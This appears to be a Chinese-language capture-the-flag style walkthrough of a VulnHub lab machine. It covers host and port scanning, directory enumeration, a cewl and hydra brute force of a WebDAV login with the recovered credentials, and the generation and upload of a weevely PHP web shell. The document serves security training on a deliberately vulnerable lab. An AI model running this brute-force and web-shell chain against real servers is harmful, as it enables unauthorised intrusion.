vulnhub是我们学习网络安全最常用的靶场之一。难易度适中,内容全面。是我们学习的不二选择。本文让我们一起学习吧!
声明:本文旨在网络安全学习和研究,坚决反对一切危害网络安全的行为。请务必遵守相关法律法规。
我们需要登录vulnhub官网对用的靶场。
如上,涉及到的靶场还是比较多的,点击靶场后我们会看到相应的靶场环境介绍。
下载靶场后,我们需要导入虚拟机,并启动即可!
曾经大神说过:”渗透测试的本质是信息收集“。在运行虚拟机后,我们首先要进行收集一波信息。
我们可以利用nmap
masscan
netdiscover
等工具扫描扫描存活的主机IP
netdiscover -i eth0 -r 192.168.123.1/24
当我们得到了主机的IP信息后,接下来需要对主机开放的端口进行扫描。
nmap -T4 -A 192.168.123.89
如上,我们只得到了22
80
两个端口。相对来说开放的端口还是比较少的。
通过对上面端口的扫描,我们只有两种方案,一种是通过80端口的web服务进行测试,另一方面就是暴力破解ssh了。相对于后者难度就大了。
我们在用kali中自带的工具dirsearch
进行目录扫描,看能否找到有用的信息。
dirsearch -u http://192.168.123.89/
如上图,我们得到了webdav
目录,通过webdav
可以实现类似ftp文件传输的功能,但是利用的是web协议。
通过弱口令登录无果。我们在次利用工具dirsearch
对站点中的文件扫描,如php
txt
等文件
dirsearch -u http://192.168.123.89 -f -e txt
通过本次扫描,我们发现了一个tips.txt
文件。访问文件,内容如下:
当时当我们访问creds.txt
文件时,又提示文件不存在。
这时,陷入了两难境地!我们要登录ssh需要账号和密码,而给出的提示文本访问时却提示不存在。通过查阅我们可以通过cewl
工具生成专门针对于目标系统的密码字典。
cewl http://192.168.123.89 -w dict.txt
hydra -L dict.txt -P dict.txt 192.168.123.89 http-get /webdav -v
如上,我们成功得到了密码。登录webdav
我们先利用kali中自带的weevely
工具生成php Shell
weevely generate 888888 /kali.php
通过davtest命令上传shell到服务器。
davtest -url http://192.168.123.89/webdav -auth yamdoot:Swarg -uploadfile kali.php -uploadloc kali2.php
接下来,我们提权即可!
更多精彩文章 欢迎关注我们